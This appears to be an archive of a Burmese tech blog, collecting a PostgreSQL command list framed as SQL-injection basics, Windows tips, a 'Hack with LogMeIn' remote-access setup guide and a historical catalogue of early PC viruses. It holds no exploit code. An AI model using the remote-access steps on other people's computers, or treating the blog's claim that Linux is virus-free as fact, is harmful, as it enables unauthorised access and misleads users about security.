CREATE AGGREGATE — define a new aggregate function
CREATE CAST — define a user-defined cast
CREATE CONSTRAINT TRIGGER — define a new constraint trigger
CREATE CONVERSION — define a user-defined conversion
CREATE DATABASE — create a new database
CREATE DOMAIN — define a new domain
CREATE FUNCTION — define a new function
CREATE GROUP — define a new user group
CREATE INDEX — define a new index
CREATE LANGUAGE — define a new procedural language
CREATE OPERATOR — define a new operator
CREATE OPERATOR CLASS — define a new operator class for indexes
CREATE RULE — define a new rewrite rule
CREATE SCHEMA — define a new schema
CREATE SEQUENCE — define a new sequence generator
CREATE TABLE — define a new table
CREATE TABLE AS — create a new table from the results of a query
CREATE TRIGGER — define a new trigger
CREATE TYPE — define a new data type
CREATE USER — define a new database user account
CREATE VIEW — define a new view
DEALLOCATE — remove a prepared query
DECLARE — define a cursor
DELETE — delete rows of a table
DROP AGGREGATE — remove a user-defined aggregate function
DROP CAST — remove a user-defined cast
DROP CONVERSION — remove a user-defined conversion
DROP DATABASE — remove a database
DROP DOMAIN — remove a user-defined domain
DROP FUNCTION — remove a user-defined function
DROP GROUP — remove a user group
DROP INDEX — remove an index
DROP LANGUAGE — remove a user-defined procedural language
DROP OPERATOR — remove a user-defined operator
DROP OPERATOR CLASS — remove a user-defined operator class
DROP RULE — remove a rewrite rule
DROP SCHEMA — remove a schema
DROP SEQUENCE — remove a sequence
DROP TABLE — remove a table
DROP TRIGGER — remove a trigger
DROP TYPE — remove a user-defined data type
DROP USER — remove a database user account
DROP VIEW — remove a view
END — commit the current transaction
EXECUTE — execute a prepared query
EXPLAIN — show the execution plan of a statement
FETCH — retrieve rows from a table using a cursor
GRANT — define access privileges
INSERT — create new rows in a table
LISTEN — listen for a notification
LOAD — load or reload a shared library file
LOCK — explicitly lock a table
MOVE — position a cursor on a specified row of a table
NOTIFY — generate a notification
PREPARE — create a prepared query
REINDEX — rebuild corrupted indexes
RESET — restore the value of a run-time parameter to a default value
REVOKE — remove access privileges
ROLLBACK — abort the current transaction
SELECT — retrieve rows from a table or view
SELECT INTO — create a new table from the results of a query
SET — change a run-time parameter
SET CONSTRAINTS — set the constraint mode of the current transaction
SET SESSION AUTHORIZATION — set the session user identifier and the current user identifier of the current session
SET TRANSACTION — set the characteristics of the current transaction
SHOW — show the value of a run-time parameter
START TRANSACTION — start a transaction block
TRUNCATE — empty a table
UNLISTEN — stop listening for a notification
UPDATE — update rows of a table
VACUUM — garbage-collect and optionally analyze a database

SQL Injection မွာ အသုံးၿပဳတဲ႔ အေၿခခံေတြပဲ ရွိပါေသးတယ္... ဒီထက္မ်ားတဲ႔ functions ေတြအမ်ားၾကီးရွိသလုိ ဒီထက္ပုိၿပီးနက္နဲတဲ႔ အသုံးၿပဳပုံေတြရွိပါတယ္... ေလ့လာတဲ႔သူေတြအေနနဲ႔ မိမိတုိ႔ကုိယ္တုိင္ SQL commands ေတြကုိ အရင္ဆုံး ကုိယ္တုိင္စမ္းစစ္ၿပီး မိမိတုိ႔ရဲ႕ SQL commands အသုံးၿပဳမႈအရည္အခ်င္းကုိ ၿမင့္တင္သင့္ပါတယ္။

Thursday, July 19

Window 7၌အသံုးျပဳလို႔မရေသာေဆာ့၀ဲလ္မ်ားကို Compatible ျဖစ္ေအာင္လုပ္နည္း



·


အခ်ိဳ႕ေသာေဆာ့၀ဲလ္မ်ား ၀င္းဒုိး 7 နဲ႔ compatible မျဖစ္ရင္ အင္စေတာ့ထည့္သြင္းလို႔မရ

တာေတြ႔ရတယ္။ ေနာက္ျပီးထည့္သြင္းလို႔ရျပန္ေတာ့လဲ အသံုးျပဳလို႔မရတာေတြျဖစ္လာျပန္

တယ္။ Window 7 ေၾကာင့္ ေဆာ့၀ဲလ္မ်ား Installation လုပ္ရာမွာ အခက္အခဲရွိလွ်င္

အသံုးျပဳႏုိင္ရန္ ပို႔စ္တင္လိုက္တာပါ။



လုပ္နည္းေလး...



၁။ Install လုပ္ခ်င္သည့္ ေဆာ့၀ဲလ္၏ icon ကုိ Right Click လုပ္၍ Properties ကုိ ဖြင့္ပါ။

၂။ Box က်လာလွ်င္ Compatibility tab ကုိ ေရြးပါ။



+/- အျပည့္အစံုသို႔



၃။ Run this program in compatibility mode for: ကုိ အမွန္ျခစ္ေပးပါ။

၄။ Window XP (Service Pack 3) သုိ႔မဟုတ္ အဆင္ေျပရာ Version ကုိ ေရြးခ်ယ္ပါ။

၅။ Apply လုပ္ Ok ။

၆။ မိမိ Install လုပ္ခ်င္သည့္ ေဆာ့၀ဲလ္ Setup.exe ဖုိင္ကုိ ျပန္ဖြင့္ၿပီး Install လုပ္ၾကည့္ပါ။



(အကယ္၍ အင္စေတာထည့္သြင္းထားျပီးလို႔ အသံုးျပဳလို႔မရရင္ ၎ေမာင္းထားျပီး

ေသာပရိုဂရမ္ (ပရိုဂရမ္ရဲ႕ ရဲ႕ icon) ကို Right Click ေထာက္၊ Properties ကို

၀င္ျပီး အေပၚက အစီအစဥ္အတိုင္းသာလုိက္လုပ္ပါ
Ref: technologymynoat/

ဟတ္ဒစ္Space မ်ားမ်ားရရွိျပီး ကြန္ျပဴတာျမန္ဆန္ေစရန္



ကြန္ပ်ဴတာ တစ္လံုးမွာ hard disk ရဲ႕ လုပ္ေဆာင္မႈ႔ ဟာ အေရးပါလွပါတယ္ မိမိရဲ႕ hard disk မွာ free space နည္းေနရင္ ကြန္ပ်ဴတာ လုပ္ေဆာင္မႈ ေႏွးလာၿခင္း၊ program မ်ား run ရာတြင္ ၾကန္႔ၾကာၿခင္းတို႔ ၿဖစ္ေပၚလာေလ႔ရွိပါတယ္…. Window တစ္ခု စတင္ လိုက္တဲ႔ အခါကတည္းက default disk setting ကိုWaste capacity ကို မ်ားစြာေပးထားတာပါ ကြ်န္ေတာ္ တို႔က အဲဒီမလို အပ္တဲ႔ wasted capacityကို ေလွ်ာ႔ခ်လိုက္ၿခင္းအားၿဖင္႔ free space မ်ားမ်ားရ ရွိေအာင္ လုပ္ေဆာင္နိုင္မွာ ၿဖစ္ပါတယ္..

လုပ္ေဆာင္ရမဲ႔ အဆင္႔နည္းနည္းမ်ားပါတယ္.. တစ္ဆင္႔ၿခင္းကို ေသေသခ်ာခ်ာ လုပ္ေဆာင္ သြားရင္ လြယ္လြယ္ေလးပါ……
ပထမဆံုး my computer ကို ဖြင္႔ပါ Local disk :C ရဲ႕ properties မွာ used space , free space ဘယ္ေလာက္ရွိတယ္ ဆိုတာကို မွတ္သားထားလိုက္ပါ ဒါမွသာ ကြ်န္ေတာ္တို႔ရဲ႕ လုပ္ေဆာင္မႈ႔ဟာ အက်ိဳးသက္ေရာက္ မႈ႔ရွိမရွိ ကို သိရွိနိုင္မွာ ပါ ..မွတ္သားၿပီးသြားရင္ေတာ႔

၁။ Start Menu , Control Panel မွ Power options ကို click ပါ

က်လာတဲ႔ Power options properties dialog box မွ Hibernate tab ကို ထပ္ၿပီး click လိုက္ပါဦး
ၿပီးရင္ Enable Hibernation ဆိုတဲ႔စာေၾကာင္းေလးကို uncheck လုပ္ၿပီး Apply , Ok ေပးပါမယ္..

၂။ Run box မွာ sysdm.cpl လို႔ရိုက္ထည္႔ၿပီးေတာ႔ enter ေခါက္ပါ

ရရွိလာတဲ႔ system properties dialog box မွ System Restore tab ကို ထပ္ၿပီး click ပါမယ္
Available drivers : ေအာက္က ( C ) ကို select ေပးၿပီး settings button ကို click ပါမယ္
Device Settings ဆိုတဲ႔ box တစ္ခုထပ္မံ က်ေရာက္လာတာ ကို ေတြ႔ရမွာပါ
Disk space to use: ေအာက္မွာ မူလက 12 % ( 6132 MB ) ရွိရာမွ 3 % ( 1386 MB) သို႔ ေလွ်ာ႔ခ်လိုက္ပါမယ္. ၿပီးရင္ Ok ေပးပါ..

၃။ Start Menu , Internet explorer ကို open ရပါမယ္
Menu bar မွ tools , Internet options ကို click ပါ
Delet files ကို ထပ္မံ click ပါမယ္ alert box တက္လာပါမယ္ ..
Delete all offline content ဆိုတဲ႔ စာေၾကာင္းကို check ေပးၿပီး Ok ေပးပါ

၄။ Delete files button ရဲ႕ ညာဘက္ေဘးက settings ကို click ပါမယ္

Amount of disk space to use : စာေၾကာင္းေအာက္က box ထဲမွာ မူလက 474 MB ေပးထားတာကို 50 MB လို႔ ၿပင္ရိုက္ၿပီး OK ,OK………..
ေနာက္ဆံုးအဆင္႔ကေတာ႔ shift+delete နဲ႔ ဖ်က္မထား မိလို႔ Recycle Bin ထဲက မလိုအပ္တဲ႔ ဖိုင္ေတြကို right click ေထာက္ၿပီး Empty Recycle Bin လုပ္ပါမယ္ ၿပီးပါၿပီဗ်ာ My computer ထဲ က Disk C မွာ free space ဘယ္ေလာက္တိုးလာ သလဲဆိုတာ စစ္ေဆးၾကည္႔လိုက္ပါဦး………

အႏွစ္ခ်ဳပ္ကေတာ႔..

• Recycle Bin: Default 10 % dropped to 1%
• Hibernation:Default ON ( for notebooks) switched OFF
• Internet explorer: Default 474 MB dropped to 50 MB
• System Restore: Default 12% dropped to 1% (~ 1 GB)

Tuesday, July 17

USB Pen Drive ၏ လၽွို႔ဝွက္ခ်က္ (၁ဝ)ခု

Hard Disk မွာ ေနရာလြတ္ နည္းပါးေနသူေတြအတြက္ အလုပ္မွအိမ္၊ အိမ္မွေက်ာင္း၊ အခ်က္အလက္ သင္ခန္းစာ၊ အလုပ္ဖိုင္ေတြကို သယ္ေဆာင္သြားလိုသူေတြအတြက္၊ စနစ္တစ္ခုလုံးကို လုံျခဳံစိတ္ခ်မွုျပည့္ဝစြာ အလုပ္လုပ္ လိုၿပီး အစီအစဥ္တက် ရွိလိုသူမ်ားအတြက္ USB Thumb Drive ရဲ့ လွ်ိဳ႕ဝွက္ခ်က္ေလးမ်ားကို စုစည္းေဖာ္ျပ လိုက္ပါတယ္။



1. USB Drive ကို icon အေနနဲ႔ သုံးနိုင္ပါတယ္တကယ္လို႔ ကြန္ပ်ဴတာမွာ USB Hub တစ္ခုကို ထားရွိသုံးစြဲမယ္ ဆိုရင္၊ ေနာက္ၿပီး USB အမ်ားႀကီးနဲ႔ Multiple USB port ေတြ ထားရွိ သုံးစြဲမယ္ဆိုရင္ အမ်ိဳးမ်ိဳး အစားစားကြဲျပားတဲ့ ကိုယ့္ရဲ့ USB ကို icon ေတြအေနနဲ႔ ေဖာ္ျပ ေပးထားနိုင္ပါတယ္။ အဲဒီလို ေဖာ္ျပေပးတဲ့ XP, Vista, Windows 7 ေတြမွာ ပါဝင္တဲ့ custom icon ေတြကို အသုံးျပဳၿပီး folder ေတြကို icon ပုံစံခ်ိန္းတဲ့ ပုံစံမ်ိဳးအဆင့္ပဲ လြယ္လြယ္ ကူကူ ရွိပါတယ္။ ပထမဦးဆုံးအေနနဲ႔ (.ico) format ကို drive ထဲမွာ အရင္ ေမာင္းထည့္ရ ပါမယ္။ အကယ္၍ web application တစ္ခုျဖစ္တဲ့ convert icon ကို အသုံးျပဳလည္း ရပါတယ္။ icon ကို အမ်ိဳးအစားကြဲျပားစြာနဲ႔ USB မွာ ရည္ညြန္းေဖာ္ျပေပးမွာ ျဖစ္တဲ့အတြက္ ဘယ္ USB က ဘာ file ေတြ ပါဝင္တယ္ဆိုတာ အလြယ္တကူ သိရွိရမွာပါ။



2. Google ၏ OS ကို အိတ္ထဲ ထည့္ထားနိုင္ပါတယ္Google ၏ OS ျဖစ္တဲ့ Chrome OS ကို USB drive ထဲမွာ ထည့္သြင္းၿပီး ကိုယ့္ကြန္ပ်ဴတာရဲ့ ဒုတိယ OS အျဖစ္ ထားရွိ သုံးစြဲနိုင္ပါတယ္။ အလြန္ျမန္ဆန္ၿပီး ကိုယ့္စိတ္ႀကိဳက္ custom ျပဳလုပ္ထားနိုင္ပါတယ္။ ဒီဇိုင္း အဆင္အျပင္ေတြကအစ ပါဝင္တဲ့ coding ေတြကို သြားျပန္ၿပီး ျပင္ဆင္ေရး သားနိုင္တဲ့ open source OS တစ္ခု ျဖစ္ပါတယ္။



3. Democra key ျဖင့္ လုံျခဳံစိတ္ခ်စြာ အလုပ္လုပ္သုံးစြဲနိုင္ပါတယ္တကယ္လို႔ USB drive ကိုျဖစ္ေစ၊ PC ကိုျဖစ္ေစ သုံးစြဲရတာ ကိုယ့္ရဲ့ကိုယ္ေရး အခ်က္အလက္ေတြနဲ႔ ကိုယ္ေရး ကိုယ္တာဖိုင္ေတြ မလုံျခဳံဘူးလို႔ ခံစားရရင္ Democra Key ကို download ရယူ၍ windows platform ေတြေပၚ မွာ အလုပ္လုပ္နိုင္ေသာ web application တစ္ခုလို သုံးစြဲနိုင္ပါတယ္။ အဲဒီအထဲမွာ ပုံရိပ္တည္းျဖတ္ တာေတြ၊ email ဖြင့္စစ္တာေတြ၊ ကိုယ္ေရးကိုယ္တာ အခ်က္အလက္ေတြကို encrypt ျပဳလုပ္တာေတြနဲ႔ Internet ကို browse လုပ္တာေတြ ျပဳလုပ္နိုင္ပါတယ္။ လုံျခဳံမွုအျပည့္အဝ ရွိပါတယ္။



4. XBMC Media Center ကို ထည့္သြင္းထားနိုင္ပါတယ္ကိုယ့္ PC မွာ WMP player နဲ႔ အျခား player မ်ားစြာရွိေပ မယ့္ XBMC live ကို ရယူၿပီး drive ထဲကို ထည့္သြင္း ထားမယ္ဆိုရင္ netbook မွာပဲျဖစ္ျဖစ္၊ laptop မွာပဲ ျဖစ္ျဖစ္ media file ေတြကို အလြယ္တကူ ၾကည့္ရွုခံစား နိုင္ပါတယ္။ အဲဒီအထဲမွာ အလြယ္တကူနဲ႔ လုပ္ေဆာင္နိုင္တဲ့ လုပ္ေဆာင္နိုင္တဲ့ လမ္းညြန္ခ်က္ေတြကို သင္ခန္းစာ ဖိုင္ေတြအေနနဲ႔ ၾကည့္ရွုၿပီး လိုက္လံလုပ္ေဆာင္နိုင္ပါတယ္။



5. Windows System တစ္ခုလုံးကို save လုပ္ထားနိုင္ပါတယ္တကယ္လို႔ Thumb drive ထဲမွာ Ubuntu စနစ္ တစ္ခုလုံးကို ထည့္သြင္းထားမယ္ဆိုရင္ windows ရဲ့စနစ္မွာ မွားယြင္းေနတဲ့အမွားေတြ၊ error ေတြ အားလုံးကို ubuntu ကတစ္ဆင့္ boot လုပ္ၿပီး ဝင္ေရာက္ၾကည့္ရွုရင္း ျပင္ဆင္နိုင္ပါတယ္။ ထို႔အတြက္ ပုန္းေအာင္းေနတဲ့ ဖိုင္ေတြ၊ ဖိုင္ေယာင္ေဆာင္ထားတဲ့ virus ေတြကို အလြယ္ တကူ ၾကည့္ရွုသတ္ပစ္နိုင္ၿပီး drive space ကို သန႔္သန႔္ရွင္းရွင္း analyze လုပ္နိုင္ပါတယ္။ Partition လုပ္တာ ေတြ၊ windows password ေတြကို ျပန္ေခၚ တာနဲ႔ ေပ်ာက္ဆုံးေနတဲ့ file ေတြကို ျပန္လည္ရွာေဖြတာေတြ ျပဳလုပ္ နိုင္ပါတယ္။ လုပ္ေဆာင္ပုံ နည္းအေသး စိတ္ကို lifehacker.com မွာ ၾကည့္ရွုနိုင္ပါတယ္။



6. USB Drive ကေနတစ္ဆင့္ Windows စနစ္တစ္ခုလုံးကို အမိန႔္ေပး ထိန္းခ်ဳပ္နိုင္ပါတယ္Windows ျပန္လည္ စတင္ခ်ိန္မွာ USB drive ကေန log off လုပ္တာေတြ၊ shut down လုပ္တာေတြကို USB drive ရဲ့ click ကို ႏွိပ္လိုက္ တာနဲ႔ အထဲထဲမွာ အမိန႔္ေပး file ေတြကို တန္းစီၿပီး ထည့္သြင္းဖို႔အတြက္ coding ေတြ လြယ္လင့္တကူ ရွိပါတယ္။



7. သယ္ေဆာင္ရ လြယ္ကူေသာ Windows Suite တစ္ခုလုံးကို ထည့္သြင္းသြားနိုင္ပါတယ္Portableapps.com မွာ ေရြ႕ေျပာင္း သယ္ယူရလြယ္တဲ့ software ကေလးေတြ၊ ဥပမာ Photoshop, acrobat reader, firefo×, gtalk စတဲ့ software ကေလးေတြကို download ရယူၿပီး USB drive ထဲ ထည့္ထားမယ္ ဆိုရင္ windows အတြက္ ေနရာ လြတ္ေတြမ်ားစြာ ထြက္ေပၚလာေစပါမယ္။ Memory အရမ္းစားတဲ့ software ေတြ ဆိုလို႔ရွိရင္လည္း memory အစား သက္သာသြားပါမယ္။ ဒါ့အျပင္ ႐ုံးက ကြန္ပ်ဴတာမွာ ကိုယ္လိုခ်င္တဲ့ software မရွိလို႔ အိမ္ျပန္အလုပ္လုပ္ လို႔ မရတဲ့သူေတြအတြက္လည္း အခ်ိန္ကုန္သက္သာ သြားေစပါတယ္။ Portable software ေတြဟာ software ႀကီးေတြက လြဲလို႔ function အစုံအလင္ ပါရွိၿပီး ပုံမွန္အတိုင္း အလုပ္ လုပ္နိုင္ပါတယ္။



8. USB Drive ထဲမွာ အေရးႀကီး Data ေတြကို ထားရွိနိုင္ပါတယ္တစ္ခ်ိဳ႕ မိသားစုနဲ႔ ပတ္သက္တဲ့ ကိုယ္ေရး ကိုယ္တာ ဖိုင္ေတြ၊ ကိုယ့္ရဲ့ အႀကံအစည္နဲ႔ ပတ္သက္တဲ့ idea စိတ္ကူး ေတြကို USB drive ထဲကို ထည့္သြင္း ထားၿပီး အဲဒီ USB ကို USB safeguard သုံးစြဲလိုက္ မယ္ဆိုရင္ USB ကို လက္လြတ္စပယ္ ထားခဲ့မယ္ဆို တာေတာင္မွ ကိုယ့္ဖိုင္ကို ဝင္ၾကည့္တဲ့အခါမွာ password ေတာင္းတာမ်ိဳးေတြ၊ ဖိုင္ကို ဝွက္ထားတာမ်ိဳးေတြ၊ ဖိုင္ပုံစံ ေဖ်ာက္ထားတာမ်ိဳးေတြ လုပ္ထားနိုင္တဲ့အတြက္ အဆင္ေျပပါတယ္။



9. လိုခ်င္တဲ့အခ်ိန္ေတြမွာ ဖိုင္ေတြကို ေရြ႕ေျပာင္းနိုင္ပါတယ္USB drive နဲ႔ hard drive ၾကားထဲမွာ ဖိုင္ေတြ ကို ေရြ႕ေျပာင္းတာ အလြန္လြယ္ကူပါတယ္။ USB ရဲ့ နည္းပညာ ျမင့္မားရင္ ျမင့္မားသလို ေရြ႕ေျပာင္းရ လြယ္ကူ ၿပီး ျမန္ဆန္ပါတယ္။ တကယ္လို႔ internet မွာ နာမည္ႀကီးေနတဲ့ ဖိုင္တင္တဲ့ upload sharing site ျဖစ္ၿပီး application မွာ ထုတ္ေပးထားတဲ့ drop bo× နဲ႔ဆိုရင္ USB ထဲက ဖိုင္ ေတြကို အဲဒီထဲထည့္တာေတြ၊ Online ေပၚမွာ ၾကည့္ရွုေနတဲ့အခ်ိန္မွာ ႐ုံးကေနတစ္ဆင့္ drop bo× ထဲ ထည့္သြင္းသိမ္းဆည္းထားၿပီး အိမ္ကေနတစ္ဆင့္ အလြယ္တကူ ျပန္လည္ၾကည့္ရွုနိုင္ပါတယ္။



10. Linu× OS ကို USB Drive ထဲ ထည့္သြင္းထားနိုင္ပါတယ္Linu× အႏြယ္ဝင္ OS ေတြဟာ virus အနတရာယ္ ကင္းရွင္းေစၿပီး သုံးစြဲရ လြယ္ကူတဲ့အျပင္ အခုဆိုရင္ ေရြ႕ေျပာင္း သယ္ေဆာင္ရ လြယ္ကူတဲ့ Portable Linu× OS ေတြပါ ထြက္ရွိလာတဲ့အတြက္ drive ထဲကို ထည့္သြင္းထားၿပီး အလုပ္လုပ္တဲ့အခါမွာ- ဥပမာ ႐ုံးမွာ virus ေတြ အလြန္ကိုက္ေနတဲ့အတြက္ ႐ုံးက virus ေတြ အိမ္က ကြန္ပ်ဴတာကို ပါလာမွာ စိုးရိမ္ေနသူမ်ားအတြက္ အလြန္ အသုံးဝင္ၿပီး ႐ုံးမွအိမ္၊ အိမ္မွ႐ုံး USB drive မွတစ္ဆင့္ လြယ္ကူစြာ အလုပ္လုပ္နိုင္မွာ ျဖစ္ပါတယ္။

Saturday, July 14

Hack with Logme In



ဒီေဆာ့၀ဲေလးရဲ့ရည္ရြယ္ခ်က္ကေတာ့တစ္ေနရာကကြန္ျပဴတာကေနနက္၀ပ္ခ်ိတ္ထားတဲ့
တစ္ျခားကြန္ျပဴတာတစ္လံုးကိုျပဳျပင္ႏိုင္ေစဖို႕ရည္ရြယ္တာပါ။ဒီေဆာ့၀ဲေလး အေၾကာင္းကို နားလည္သြားရင္
ဘယ္သူကိုမွသြားၿပီး ဒုတ္ခမေပး ဖို. အဲဒီအတြက္ ႀကိဳၿပီး ေျပာထားပရေစ။
၁။ www.logmein.com ကို၀င္ပါ။ ၿပီးရင္ Download logmein free ဆိုတဲ့ အစိမ္းေရာင္ အကြက္ေလးကို ကလစ္လုပ္ပါ။
ၿပီးရင္ အီးေမးလ္ တို. ဘာညာတို. ရိုက္ၿပီး အေကာင့္ ဖြြင့္ပါ။ ၿပီးရင္ Go ကို ႏွိပ္။
၂။ၿပီးရင္ add computer ကို ထပ္ႏိွပ္။ ၿပီးရင္ ေဆာ့၀ဲကို ေဒါင္းေလာ့ဆြဲပါ။
၃။ ၿပီးရင္ ေဆာ့၀ဲကို Run လိုက္ပါ။ Next => I agree => typical => Next =>Next=>
computer access code ဆိုၿပီးေတာင္းရင္ ေပးခ်င္တဲ့ password 8 လံုးေပးလိုက္ပါ။ ေအာက္မွာလည္း
အဲ ဒီ 8 လံုးပဲ ျပန္ရိုက္။ ကိုယ္ေပးထားတာေတာ့ မွက္ထားဦးေနာ္။
၄။ Email ေတာင္းရင္ ခုနက အေကာင့္ ဖြင့္တုန္းက ေပးခဲ့တဲ့ အီးေမးကို ျပန္ထည့္။ password ကလဲ အေကာင့္ဖြင့္တုန္းကေပးတဲ့ password ပဲအင။ ၿပီးရင္ Next ကို မႏွိပ္နဲ.ဦး။ logmein freee ဆိုတာေရြးေပးလိုက္ဦး။
ၿပီးမွ Next လုပ္။
၅။ အင္စေတာလုပ္ၿပီးသြားရင္ Restart ခ်ရလိမ့္မယ္။ ဒါဆိုရင္ ၿပီးသြားပါၿပီ။ Task Bar ရဲ့ ညာဘက္ေအာက္မွာ ေခြးေျခရာ
ပံုေလးေပၚေနပါလိမ့္မယ္။
၆။ အဲဒီ ကြန္ျပဴတာကို ဖြင့္ထားၿပီး
တျခားကြန္ျပဴတာကေနၿပီး အင္တာနက္က www.logmein.com ဆိုတဲ့ ၀က္ဆိုဒ္ကို ျပန္၀င္
၇။ ၀ဘ္ဆိုဒ္ရဲ့ ညာဘက္ ထိတ္နာမွာ Email မွာ ကိုယ္အေကာင့္ဖြင့္ထားတဲ့ အီးေမးလ္ ရိုက္ထည့္ ၊ ၿပီးရင္ Password ေပါ့။
Enter ။
က်န္တာေတြကေတာ့ ကိုယ့္ဘာသာစမ္းလို.ရလိမ့္မယ္လို. ထင္ပါတယ္။
နိဳင္ငံရပ္ျခားက ကြန္ျပဴတာေတြကို ကိုယ့္ေနရာကေနၿပီး လွမ္းျပင္နိဳင္ပါေစဗ်ာ။

MCDA မွဖ်က္ခုတ္လာသည္ (ပို႕အသစ္မတင္ျဖစ္ႏိုင္ေသာေၾကာင့္)

Monday, June 25

Kinds of computer virus






It is difficult to name, identify and classify PC viruses.
Everyone who first discovers a virus will name it and describe
what they think of it. In most cases, the virus is not new and
has been named and described dozens of times before. None of the
names and few of the descriptions will match. While I'm writing
this, for example, I feel certain that someone, somewhere has
just been infected by the Jerusalem virus and they are telling
their co-workers and friends about it as if it were newborn - and
for them perhaps it is. It will be impossible to verify the
strain and variety of the infection, however, unless we can get a
living sample of the virus to analyze and compare with other
strains of this same virus. So problem number one is filtering
the reports of infection and collecting samples that can be
placed under the knife.
Problem number two is - where do you draw the line between
an original virus and a true variation of the virus? The
original Brain virus, for example, could only infect a floppy
diskette. Do the varieties of the Brain that can infect hard
disks (but in every other respect are identical) deserve to be
called new viruses, or are they still the Brain? What about
further modifications that destroy data? Is this now a new
virus? What if someone extracts a segment of the Brain code and
uses it as a basis for a new virus? What if nothing changes but
the imbedded text data, so that the virus is in every way
functionally identical, but the volume label changes to "SMURF"
instead of BRAIN. All of these modifications to the Brain have
been discovered and logged. How do we deal with them?
I choose to deal with these modifications in the simplest
way I know. If the virus differs in any way from the original
(assuming that the "original" can in fact be identified), then I
log it as a new strain. This relieves me from having to make
decisions. Those of you who see the world differently can merely
take this listing and lump together all of the different strains
that you like. That way we'll all be happy.

This will be, by the way, my last virus document. I have
worked double time for the past eighteen months helping John
McAfee and his Homebase folks and, while I have thouroughly
enjoyed myself, I have finally burned out. It has been great fun
and I've learned a lot, and hopefully some of my works, like the
product review with Sankary and Marsh, will end up being somehow
useful to the world. But now I have the irresistible urge to go
fishing, and, perhaps afterwards, to contemplate my navel for a
few years. In-between times I intend to write a book on the
craziness in this industry and about the unique personalities
I've had the pleasure to work with in the Virus Marine Corps.
It's been quite an adventure. Thank you all.

Jim Goodwin From the Homebase BBS 408 988 4004




THE VIRUSES

I have arranged these viruses so that similar varieties are
described in the sequence in which they appeared within the virus
sub-group (to the best of my knowledge). Not everyone agrees
with my groupings. Many people believe, for instance, that the
Golden Gate-C (Mazatlan Virus) is a distinctly original virus and
is not a variation of the Alameda. I think differently and have
endeavored to show how the Golden Gate evolved from the Alameda,
through each precursor virus. I cannot prove, of course, that
the sequence of appearances is the correct sequence, and in many
cases I have had to guess. If anyone wishes to re-order
these virus, I will not be offended.
I have not included any of the specific application trojans
in this list. There has been a lot of discussion about the Lotus
123 and DBASE "viruses", for example. These are not replicating
programs and I do not classify them as viruses. I had originally
intended a separate list to include these non-replicating trojans
but Time caught up with me.



1. ALAMEDA VIRUS
(Also called: Yale; Merritt; Pecking; Seoul)
This is a boot sector infector. First discovered at Merritt
college in California (1987). Original version caused no
intentional damage. Replicates at boot time --
and infects only 5 1/4" 360KB floppies. It saves the
real boot sector at track 39, sector 8, head 0. Contains a
count of the number of times it has infected other
diskettes, although it is referenced for write only and is
not used as part of an activation algorithm. The virus
remains resident at all times after it is booted, even if no
floppy is booted and BASIC is loaded. Contains a rare POP
CS instruction that makes it incapable of infecting 286
systems.

2. ALAMEDA-B
(Also called Sacramento Virus)
This is the original Alameda Virus that has the POP CS
removed. Relocation is accomplished through a long jump
instruction. All other characteristics are identical. This
version runs OK on a 286.

3. ALAMEDA-C
This is the Alameda-B virus that has been modified to
disable the boot function after 100 infections. The
counter in the original Alameda virus has been re-activated
and is interrogated at each bootup. When it reaches 100 the
virus disconnects from the original boot sector (control is
no longer passed) and the diskette will no longer boot. At
infection time, the counter is zeroed on the host diskette.

4. SF VIRUS
This is the Alameda-C that has been modified to format the
boot diskette when the counter runs out.

5. GOLDEN GATE VIRUS
(Also called The 500 Virus)
This is the SF Virus that has been modified to format the C
drive when the counter runs out. The activation occurs
after 500 infections, instead of 100 infections. Note that
in all three of these strains, the counter is zeroed on the
host diskette at infection time. Thus, the activation
period on this virus will on the average stretch into many
years. No corruption will occur until 500 new diskettes
have been infected from within a given machine. Since the
infection can only occur when the system is booted with a
new diskette, infection is not frequent with this virus. I
expect that the overwhelming majority of infections will
never activate. The IBM PC will have long since been
supplanted by another architecture in most environments.

6. GOLDEN GATE-B
This virus is the Golden Gate virus that has had the
activation delay reset to 30 infections. This virus should
activate within a couple of years in most environments.

7. GOLDEN GATE-C
(Also called the Mazatlan Virus)
This virus is the Golden Gate virus that is able to infect a
hard disk. It is a nasty virus, since it has more of an
opportunity to do damage than previous versions. Prior
versions were limited since systems with hard disks are only
infrequently booted from floppy and booting from hard disk
overwrote earlier versions.

8. GOLDEN GATE-D
This virus is identical to number 7, except the counter has
been disabled (similar to original Alameda).

9. THE BRAIN
(Also called, Pakistani Brain; Basit Virus)
This virus originated in January, 1986, in Lahore Pakistan.
It is the only virus yet discovered that includes the valid
names address and phone numbers of the original
perpetrators. The Brain is a boot sector infector,
approximately 3K in length, that infects 5 1/4" floppies.
It cannot infect hard disks. It will infect a diskette
whenever the diskette is referenced. For example, a
Directory command, executing a program from the diskette,
copying a file from or to the diskette or any other access
will cause the infection to occur. The virus stores the
original boot sector, and six extension sectors, containing
the main body of the virus, in available sectors which are
then flagged as bad sectors.

The virus is able to hide from detection by intercepting any
interrupt that might interrogate the boot sector and re-
directing the read to the original boot sector. Thus,
programs like the Norton Utilities will be unable to see the
virus.

Infected diskettes are noticeable by "@BRAIN" displayed in
the volume label.

10. BRAIN-B
(Also called Brain-HD; the Hard Disk Brain; Houston Virus)
This virus is identical in every respect to the original
Brain, with the single exception that it can infect the C
drive.

11. BRAIN-C
This virus is the Brain-B that has the volume label code
removed. The volume label of infected diskettes does not
change with this virus. This virus was difficult to detect
since it does nothing overt in the system.

12. CLONE VIRUS
This virus is the Brain-C that saves the original boot
copyright label and restores it to the infected boot. The
Basit & Mjad original Brain messages have been replaced with
non-printable garbage that looks like instructions if viewed
through Norton or other utility. Even if the system is
booted from a clean diskette, it is virtually impossible to
tell, by visual inspection, whether the hard disk is
infected.

13. SHOE_VIRUS
(Also called UIUC Virus)
This virus is the Brain-B Virus that has been modified to
include the message - "VIRUS_SHOE RECORD, v9.0. Dedicated
to the dynamic memories of millions of virus who are no
longer with us today". The message is never displayed.

14. SHOE_VIRUS-B
This is the Shoe_Virus that has been modified to so that it
can no longer infect hard disks. The v9.0 has been changed
to v9.1.

15. ClONE-B
This is the Clone virus that has been modified to corrupt
the FAT when it is booted after May 5, 1992. There are no
other apparent modifications.

16. DOS-62
(Also called the UNESCO Virus)
This virus is a COM infector. It was first discovered in
Moscow in April, 1988. It was first publicized in August
1988 when it cropped up at a children's computer Summer camp
run by UNESCO. When a program infected by this virus is
executed, it infects one other COM file in the system. On a
random basis, infected programs will perform a system re-
boot when they are executed.

17. 62-B
This virus is similar to DOS-62 except the re-boot is
replaced by deleting the executed program.

18. FRIDAY THE 13th
(Also called COM Virus; 512 virus)
This virus is a non-resident COM infector that first
